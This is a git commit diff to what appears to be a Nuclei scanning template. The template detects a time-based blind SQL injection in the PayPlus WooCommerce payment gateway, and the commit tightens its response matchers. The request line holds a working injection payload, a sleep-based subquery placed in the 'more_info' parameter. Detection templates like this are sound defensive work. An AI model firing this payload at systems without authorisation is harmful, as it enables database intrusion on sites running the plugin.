Kazgangap 2024-07-19 23:19:16 +03:00
parent 1157e10796
commit 2f1db087b7
1 changed files with 1 additions and 11 deletions

View File

@ -31,20 +31,10 @@ http:
GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(body,"-1") && contains(content_type,"text/html")'
- 'status_code == 302'
condition: and
- type: word
part: body
words:
- '-1'
- type: word
part: content_type
words:
- 'text/html'